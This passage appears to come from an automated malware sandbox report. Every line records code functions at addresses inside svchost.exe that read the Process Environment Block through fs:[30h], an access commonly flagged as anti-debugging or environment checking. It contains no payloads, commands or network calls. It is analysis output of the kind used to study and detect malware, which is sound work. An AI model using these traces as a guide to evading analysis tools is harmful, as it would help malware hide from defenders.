                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB3D0 mov ecx, dword ptr fs:[00000030h]2_2_03AEB3D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D mov eax, dword ptr fs:[00000030h]2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D mov eax, dword ptr fs:[00000030h]2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F32A mov eax, dword ptr fs:[00000030h]2_2_03A5F32A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A27330 mov eax, dword ptr fs:[00000030h]2_2_03A27330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF367 mov eax, dword ptr fs:[00000030h]2_2_03AEF367
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05341 mov eax, dword ptr fs:[00000030h]2_2_03B05341
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05283 mov eax, dword ptr fs:[00000030h]2_2_03B05283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B052E2 mov eax, dword ptr fs:[00000030h]2_2_03B052E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF2F8 mov eax, dword ptr fs:[00000030h]2_2_03AEF2F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A292FF mov eax, dword ptr fs:[00000030h]2_2_03A292FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05227 mov eax, dword ptr fs:[00000030h]2_2_03B05227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A59274 mov eax, dword ptr fs:[00000030h]2_2_03A59274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6724D mov eax, dword ptr fs:[00000030h]2_2_03A6724D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A87190 mov eax, dword ptr fs:[00000030h]2_2_03A87190
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A351ED mov eax, dword ptr fs:[00000030h]2_2_03A351ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03A6D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03A6D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B051CB mov eax, dword ptr fs:[00000030h]2_2_03B051CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]
